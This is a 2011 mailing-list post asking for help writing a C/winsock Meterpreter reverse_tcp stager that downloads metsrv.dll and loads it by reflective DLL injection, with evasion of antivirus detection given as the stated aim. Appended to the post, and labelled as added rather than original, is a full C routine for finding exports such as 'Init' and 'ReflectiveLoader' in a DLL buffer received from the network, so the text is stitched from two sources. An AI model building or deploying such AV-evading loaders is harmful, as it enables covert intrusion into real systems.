Fail to write a C/winsock Meterpreter Reflective DLL Injection snippet
From: al1c3andb0b <al1c3andb0b () lavabit com>
Date: Fri, 08 Apr 2011 05:07:48 +0200
My goal is to write a C/winsock program compatible with
exploit/generic/handler and payload/windows/meterpreter/reverse_tcp: a
program that is able to connect back to the handler, download the metsrv
DLL, and load and initialize it.
- I allocate (malloc) a buffer (char* pe_image) of 749056 bytes
- I create a SOCKET, connect()/select()/recv() to download the
metsrv.dll into that buffer
At this point, I can write the buffer to a binary file, call
LoadLibrary() to load the PE, and GetProcAddress() to resolve the "Init"
function and invoke it. That creates the expected Meterpreter session on
the handler side.
To have a chance of avoiding AV detection, I would like to use reflective
injection, as described in S. Fewer's paper.
For this I attempt to reuse some of his (Harmony Security) source code,
which I found under meterpreter/source/ReflectiveDLLInjection.
I import ReflectiveLoader.h, ReflectiveDLLInjection.h, LoadLibraryR.h,
I'd like to start with local injection.
Reading LoadLibraryR.c, I've found LoadLibraryR( LPVOID lpBuffer, DWORD
dwLength ) very close to my requirements:
- parse the DLL buffer for the export table, and locate the
- invoke this function to trigger the actual injection
- the function returns the address of the DLL new entry point
- invoke this entry point
Invoking the LoadLibraryR() function with my buffer as parameter seems to
work, as I can see (debug) that the reflective loader is found and the
returned HMODULE is not null.
That obviously does not trigger any Meterpreter session, as this
implementation of LoadLibraryR() does not invoke Init(SOCKET). And I
was not able to use this HMODULE as a parameter for GetProcAddress() to
resolve the "Init" function (it may not actually be "registered" in the
main process import table, as by the LoadLibrary() syscall).
So I changed the prototype from:
LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
to:
LoadLibraryR( LPVOID lpBuffer, DWORD dwLength, SOCKET metsocket )
and in the implementation from:
// call the loaded librarys DllMain to get its HMODULE
// Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for
if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )
hResult = NULL;
to:
pDllMain( NULL, DLL_QUERY_HMODULE, &hModule );
BOOL attached= pDllMain( hModule /* or NULL without line above */,
This last line causes the debugger to hang (in MSVC, the Call stack and
Local windows are empty, I have to stop the process) with no Meterpreter
I've also tried to use the LoadRemoteLibraryR() function, but didn't
find a solution to the "different address spaces" issue.
I must be missing some important points, but can't figure them out. As
I'm far from being fluent in x86 assembler, the shellcode within the
related ruby sources (msfpayload, stagers, stages) didn't help me much.
Any help on what I'm doing/thinking wrong is welcome. As any pointer to
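One building block the post's flow needs, shown here as an added example and not as code from the post, from S. Fewer's ReflectiveDLLInjection sources or from Metasploit: resolving an export (here "Init") from a PE image that was never registered with the Windows loader, by walking the PE export directory directly rather than through GetProcAddress(). The function takes the image as a byte buffer and handles both the memory-mapped layout a reflective loader produces (RVA equals offset from the base) and the raw file layout as received over the socket (RVA translated through the section table), and it bounds-checks every offset because the buffer came off the network. The names pe_find_export, build_sample_image and lookup_in_sample, and the tiny synthetic PE image with two exports, are constructed for this example; on Windows the returned RVA is added to the module base to obtain a callable pointer.

```c
/* Added example: locate an export by name in a PE image held in a byte buffer
 * by walking IMAGE_EXPORT_DIRECTORY by hand. Portable C99 with the needed PE
 * offsets spelled out (no <windows.h>), so it also builds on Linux. The image
 * is assumed to be little-endian, as on x86. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }
#define BAD ((size_t)-1)

/* RVA -> buffer offset. A memory-mapped image (what a reflective loader produces)
 * uses the RVA directly; a raw file image (what recv() delivers) goes through the
 * section table. Caller has already validated the NT header position. */
static size_t rva_to_off(const uint8_t *img, size_t len, int mapped, uint32_t rva)
{
    if (mapped) return rva;
    uint32_t nt = rd32(img + 60);
    size_t sec = (size_t)nt + 24 + rd16(img + nt + 20);          /* first section header */
    for (uint16_t i = 0, n = rd16(img + nt + 6); i < n; i++, sec += 40) {
        if (sec + 40 > len) return BAD;
        uint32_t vsz = rd32(img + sec + 8), va = rd32(img + sec + 12);
        uint32_t rsz = rd32(img + sec + 16), raw = rd32(img + sec + 20);
        if (rva >= va && rva < va + (vsz > rsz ? vsz : rsz)) return raw + (rva - va);
    }
    return BAD;                                                   /* not backed by any section */
}

/* Returns the RVA of export `name`, or 0 if it is absent or the image is malformed.
 * Every offset is checked against `len`: the buffer came off the network. */
uint32_t pe_find_export(const uint8_t *img, size_t len, int mapped, const char *name)
{
    if (len < 64 || rd16(img) != 0x5A4D) return 0;                          /* "MZ" */
    uint32_t nt = rd32(img + 60);
    if ((size_t)nt + 26 > len || rd32(img + nt) != 0x00004550) return 0;    /* "PE\0\0" */
    size_t dd = (size_t)nt + 24 + (rd16(img + nt + 24) == 0x20b ? 112 : 96); /* DataDirectory[0] */
    if (dd + 8 > len) return 0;
    uint32_t exp_rva = rd32(img + dd), exp_size = rd32(img + dd + 4);
    size_t ed = exp_rva ? rva_to_off(img, len, mapped, exp_rva) : BAD;
    if (ed == BAD || ed + 40 > len) return 0;
    uint32_t nfuncs = rd32(img + ed + 20), nnames = rd32(img + ed + 24);
    size_t funcs = rva_to_off(img, len, mapped, rd32(img + ed + 28));
    size_t names = rva_to_off(img, len, mapped, rd32(img + ed + 32));
    size_t ords  = rva_to_off(img, len, mapped, rd32(img + ed + 36));
    if (funcs == BAD || names == BAD || ords == BAD) return 0;
    for (uint32_t i = 0; i < nnames; i++) {
        if (names + 4 * i + 4 > len || ords + 2 * i + 2 > len) return 0;
        size_t s = rva_to_off(img, len, mapped, rd32(img + names + 4 * i));
        if (s == BAD || s >= len || !memchr(img + s, 0, len - s)) return 0;  /* unterminated name */
        if (strcmp((const char *)img + s, name) != 0) continue;
        uint16_t ord = rd16(img + ords + 2 * i);
        if (ord >= nfuncs || funcs + 4 * ord + 4 > len) return 0;
        uint32_t rva = rd32(img + funcs + 4 * ord);
        /* an RVA inside the export directory is a forwarder string, not code */
        return (rva >= exp_rva && rva < exp_rva + exp_size) ? 0 : rva;
    }
    return 0;
}

/* Constructed sample (not a real DLL): a minimal PE32 image with one section whose
 * export table lists "Init" and "ReflectiveLoader". `mapped` selects the memory
 * layout (section at its RVA) or the file layout (section at its raw offset). */
size_t build_sample_image(uint8_t *buf, int mapped)
{
    const uint32_t rva = 0x200, raw = mapped ? 0x200 : 0x300;
    size_t len = raw + 0x100;
    memset(buf, 0, len);
    wr16(buf, 0x5A4D); wr32(buf + 60, 64);                          /* MZ, e_lfanew */
    wr32(buf + 64, 0x4550); wr16(buf + 70, 1); wr16(buf + 84, 224); /* PE, 1 section, PE32 opt hdr */
    wr16(buf + 88, 0x10b); wr32(buf + 184, rva); wr32(buf + 188, 0x100); /* magic, export dir */
    uint8_t *sh = buf + 312;                                        /* section header */
    wr32(sh + 8, 0x100); wr32(sh + 12, rva); wr32(sh + 16, 0x100); wr32(sh + 20, raw);
    uint8_t *ed = buf + raw;                                        /* export directory */
    wr32(ed + 20, 2); wr32(ed + 24, 2);                             /* NumberOfFunctions/Names */
    wr32(ed + 28, rva + 0x40); wr32(ed + 32, rva + 0x50); wr32(ed + 36, rva + 0x60);
    wr32(ed + 0x40, 0x1000); wr32(ed + 0x44, 0x1500);               /* AddressOfFunctions */
    wr32(ed + 0x50, rva + 0x70); wr32(ed + 0x54, rva + 0x78);       /* AddressOfNames */
    wr16(ed + 0x60, 0); wr16(ed + 0x62, 1);                         /* AddressOfNameOrdinals */
    memcpy(ed + 0x70, "Init", 5); memcpy(ed + 0x78, "ReflectiveLoader", 17);
    return len;
}

/* Build the sample in the requested layout and resolve one name from it. */
uint32_t lookup_in_sample(int mapped, const char *name)
{
    static uint8_t buf[0x400];
    return pe_find_export(buf, build_sample_image(buf, mapped), mapped, name);
}

int main(void)
{
    printf("mapped Init             -> 0x%x\n", lookup_in_sample(1, "Init"));
    printf("raw    ReflectiveLoader -> 0x%x\n", lookup_in_sample(0, "ReflectiveLoader"));
    printf("raw    NoSuchExport     -> 0x%x\n", lookup_in_sample(0, "NoSuchExport"));
    return 0;
}
```

Against a real image, pass the buffer returned by recv() with mapped = 0, or the base address returned by a reflective loader with mapped = 1; the same walk also finds "ReflectiveLoader" in the raw buffer, which is what a loader does before anything has been mapped.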